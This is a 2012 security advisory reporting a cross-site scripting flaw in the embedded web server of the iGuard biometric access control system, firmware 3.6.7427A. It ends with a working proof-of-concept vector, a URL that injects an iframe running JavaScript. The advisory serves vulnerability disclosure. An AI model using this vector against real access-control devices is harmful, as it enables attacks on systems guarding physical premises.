Tile
====
iGuard Security Access Control System Webserver,  Cross Site Scripting (XSS)


Author
======

Usman Saeed , Xc0re Security Research Group

Website : http://www.xc0re.net

Twitter : http://twitter.com/xc0resecurity

Blog : http://www.xc0re.net/blog

Published : http://www.xc0re.net/index.php?p=1_25_iGuard-Biometrics-Access-Control-Webserver-XSS


Date
====
2nd , May , 2012



Severity:
=========
Medium



Description
===========
iGuard Biometrics Access Control or iGuard Security Access Control System has Cross Site Scripting vulnerability in its embedded webserver , iGuard Embedded Web Server/3.6.7427A. 



Previous Vulnerability
======================
The Previous Vulnerability was discovered in 2011, iGuard Biometrics Access Control cross-site scripting, caused by improper validation of user-supplied input by the month, record and department modules.




Target iGuard System Scecifications
============================

Device Firmware Version : 3.6.7427A 

Device WebServer : iGuard Embedded Web Server/3.6.7427A 



Tested on 
=========

Windows 7 Professional 


Browser Used
=============
Mozilla Firefox 12.0 


Vector
======

http://[Remote host]/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp






				Copyright © 2012| Xc0re Security Research Group